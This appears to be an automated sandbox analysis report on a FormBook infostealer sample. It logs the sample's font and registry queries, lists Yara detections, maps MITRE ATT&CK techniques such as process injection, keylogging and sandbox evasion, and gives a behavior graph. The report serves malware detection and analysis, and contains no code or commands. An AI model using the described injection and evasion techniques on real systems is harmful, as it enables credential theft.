            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\EH5ro3Hyug.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\EH5ro3Hyug.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.dll VolumeInformation
Source: C:\Users\user\Desktop\EH5ro3Hyug.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; File source: 6.2.EH5ro3Hyug.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.EH5ro3Hyug.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000000.730557103.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.691567196.0000000003BF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.753692091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.934957623.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.934785962.0000000003080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.754960764.0000000001890000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.714656452.0000000006BFF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.934221004.0000000002A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.754337166.0000000001860000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match; the file sources are the same eleven unpacked PE and memory dumps listed under Stealing of Sensitive Information above.

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
---------------|-----------|-------------|----------------------|-----------------|-------------------|-----------|------------------|------------|--------------|---------------------|-----------------|------------------------|-------
Valid Accounts | Shared Modules1 | Path Interception | Process Injection612 | Rootkit1 | Credential API Hooking1 | Security Software Discovery221 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading1 | Input Capture1 | Process Discovery2 | Remote Desktop Protocol | Input Capture1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Archive Collected Data1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion31 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection612 | LSA Secrets | System Information Discovery112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing12 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

Behavior Graph ID: 491359  Sample: EH5ro3Hyug  Start date: 27/09/2021  Architecture: WINDOWS  Score: 100

Start
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures
  -> EH5ro3Hyug.exe (started)
       Dropped file: C:\Users\user\AppData\...H5ro3Hyug.exe.log, ASCII
       Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
       -> EH5ro3Hyug.exe (started)
